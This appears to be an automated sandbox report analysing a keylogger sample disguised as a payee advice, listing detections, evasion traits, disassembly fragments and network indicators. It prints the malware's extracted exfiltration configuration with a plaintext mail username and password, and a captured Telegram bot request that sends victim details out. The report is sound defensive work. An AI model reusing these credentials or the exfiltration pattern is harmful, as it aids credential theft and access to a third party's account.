Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PayeeAdvice_HK54912_R0038704_37504.exe

Overview

General Information

Sample name:PayeeAdvice_HK54912_R0038704_37504.exe
Analysis ID:1556938
MD5:a7071c7cf3999b13607413c36e8d5418
SHA1:a4d955d14cfb368d93bc7083214b01dec4c90f2b
SHA256:4cdbe754de2114be5f9ccf7e3f3d4f9f7f8fadc279e860bb1773aee0e2de4047
Tags:exeuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "wajahat@foodex.com.pk", "Password": "wajahat1975", "Host": "mail.foodex.com.pk", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000000.00000002.2666489951.000000000839D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 5620JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6256JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: PayeeAdvice_HK54912_R0038704_37504.exe PID: 6256JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 37.27.123.72, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe, Initiated: true, ProcessId: 6256, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 51084
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-16T16:51:18.035886+010028033053Unknown Traffic192.168.2.551068188.114.97.3443TCP
            2024-11-16T16:51:20.955066+010028033053Unknown Traffic192.168.2.551072188.114.97.3443TCP
            2024-11-16T16:51:22.783425+010028033053Unknown Traffic192.168.2.551074188.114.97.3443TCP
            2024-11-16T16:51:24.205191+010028033053Unknown Traffic192.168.2.551076188.114.97.3443TCP
            2024-11-16T16:51:25.870768+010028033053Unknown Traffic192.168.2.551078188.114.97.3443TCP
            2024-11-16T16:51:28.771956+010028033053Unknown Traffic192.168.2.551082188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-16T16:51:16.029541+010028032742Potentially Bad Traffic192.168.2.551066158.101.44.24280TCP
            2024-11-16T16:51:17.326339+010028032742Potentially Bad Traffic192.168.2.551066158.101.44.24280TCP
            2024-11-16T16:51:18.732541+010028032742Potentially Bad Traffic192.168.2.551069158.101.44.24280TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: PayeeAdvice_HK54912_R0038704_37504.exeAvira: detected
            Source: 00000004.00000002.3349133220.0000000037491000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "wajahat@foodex.com.pk", "Password": "wajahat1975", "Host": "mail.foodex.com.pk", "Port": "587", "Version": "4.4"}
            Source: PayeeAdvice_HK54912_R0038704_37504.exeReversingLabs: Detection: 31%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A7787A8 CryptUnprotectData,4_2_3A7787A8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_3A778EF1 CryptUnprotectData,4_2_3A778EF1
            Source: PayeeAdvice_HK54912_R0038704_37504.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:51067 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:51083 version: TLS 1.2
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405772
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_0040622D FindFirstFileW,FindClose,0_2_0040622D
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_00402770 FindFirstFileW,4_2_00402770
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405772
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4_2_0040622D FindFirstFileW,FindClose,4_2_0040622D
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 0016F45Dh4_2_0016F2C0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 0016F45Dh4_2_0016F4AC
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 0016FC19h4_2_0016F974
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EF31E0h4_2_39EF2DC8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EF2C19h4_2_39EF2968
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EFE501h4_2_39EFE258
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EFE0A9h4_2_39EFDE00
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EFDC51h4_2_39EFD9A8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EFD7F9h4_2_39EFD550
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EF31E0h4_2_39EF310E
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EFD3A1h4_2_39EFD0F8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EFCF49h4_2_39EFCCA0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_39EF0040
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_39EF0853
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EFFAB9h4_2_39EFF810
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EFF661h4_2_39EFF3B8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EFF209h4_2_39EFEF60
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EF0D0Dh4_2_39EF0B30
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EF1697h4_2_39EF0B30
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EFEDB1h4_2_39EFEB08
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 39EFE959h4_2_39EFE6B0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_39EF0673
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A777EB5h4_2_3A777B78
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7779C9h4_2_3A777720
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A779280h4_2_3A778FB0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77BA76h4_2_3A77B7A8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A777119h4_2_3A776E70
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A774D21h4_2_3A774A78
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77D146h4_2_3A77CE78
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A773709h4_2_3A773460
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77F136h4_2_3A77EE68
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A771CF9h4_2_3A771A50
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7702E9h4_2_3A770040
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7762D9h4_2_3A776030
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77BF06h4_2_3A77BC38
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7748C9h4_2_3A774620
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77DEF6h4_2_3A77DC28
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A776CC1h4_2_3A776A18
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7732B1h4_2_3A773008
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A770B99h4_2_3A7708F0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77F5C6h4_2_3A77F2F8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A775179h4_2_3A774ED0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A777571h4_2_3A7772C8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77C396h4_2_3A77C0C8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77E386h4_2_3A77E0B8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A772151h4_2_3A771EA8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A770741h4_2_3A770498
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then mov esp, ebp4_2_3A77B081
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A776733h4_2_3A776488
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A772A01h4_2_3A772758
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77C826h4_2_3A77C558
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A770FF1h4_2_3A770D48
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77E816h4_2_3A77E548
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7755D1h4_2_3A775328
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77B5E6h4_2_3A77B318
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7725A9h4_2_3A772300
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77D5D6h4_2_3A77D308
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7718A1h4_2_3A7715F8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77CCB6h4_2_3A77C9E8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77ECA6h4_2_3A77E9D8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A775E81h4_2_3A775BD8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A772E59h4_2_3A772BB0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A771449h4_2_3A7711A0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77DA66h4_2_3A77D798
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A775A29h4_2_3A775780
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A77FA56h4_2_3A77F788
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E6970h4_2_3A7E6678
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E6347h4_2_3A7E5FD8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E4746h4_2_3A7E4478
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7ED768h4_2_3A7ED470
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EAC60h4_2_3A7EA968
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E0C2Eh4_2_3A7E0960
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E8158h4_2_3A7E7E60
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E3E26h4_2_3A7E3B58
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EEF50h4_2_3A7EEC58
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EC448h4_2_3A7EC150
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E5E16h4_2_3A7E5B48
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E9940h4_2_3A7E9648
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E030Eh4_2_3A7E0040
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E6E38h4_2_3A7E6B40
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E3506h4_2_3A7E3238
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EDC30h4_2_3A7ED938
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EB128h4_2_3A7EAE30
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E54F6h4_2_3A7E5228
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E8620h4_2_3A7E8328
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EF418h4_2_3A7EF120
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E2BE6h4_2_3A7E2918
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EC910h4_2_3A7EC618
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E19DEh4_2_3A7E1710
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E9E08h4_2_3A7E9B10
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E4BD7h4_2_3A7E4908
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E7300h4_2_3A7E7008
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EE0F8h4_2_3A7EDE00
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E22C6h4_2_3A7E1FF8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EB5F0h4_2_3A7EB2F8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E10BEh4_2_3A7E0DF0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E8AE8h4_2_3A7E87F0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E42B6h4_2_3A7E3FE8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EF8E0h4_2_3A7EF5E8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7ECDD8h4_2_3A7ECAE0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EA2D0h4_2_3A7E9FD8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E079Eh4_2_3A7E04D0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E77C8h4_2_3A7E74D0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E3996h4_2_3A7E36C8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EE5C0h4_2_3A7EE2C8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EBAB8h4_2_3A7EB7C0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E5986h4_2_3A7E56B8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E8FB0h4_2_3A7E8CB8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EFDA8h4_2_3A7EFAB0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E3076h4_2_3A7E2DA8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7ED2A0h4_2_3A7ECFA8
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E1E47h4_2_3A7E1BA0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EA798h4_2_3A7EA4A0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E5066h4_2_3A7E4D98
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E7C90h4_2_3A7E7998
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EEA88h4_2_3A7EE790
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E2756h4_2_3A7E2488
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7EBF80h4_2_3A7EBC88
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E154Eh4_2_3A7E1280
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A7E9478h4_2_3A7E9180
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A811FE8h4_2_3A811CF0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A811190h4_2_3A810E98
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A811B20h4_2_3A811828
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A810338h4_2_3A810040
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A810CC8h4_2_3A8109D0
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A810801h4_2_3A810508
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then jmp 3A811658h4_2_3A811360
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_3A993E70
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_3A993E60
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_3A990A10
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_3A9908DE
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_3A990960
            Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_3A990D26

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.5:51084 -> 37.27.123.72:587
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.69 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:473627%0D%0ADate%20and%20Time:%2017/11/2024%20/%2001:14:08%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20473627%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:51066 -> 158.101.44.242:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:51069 -> 158.101.44.242:80
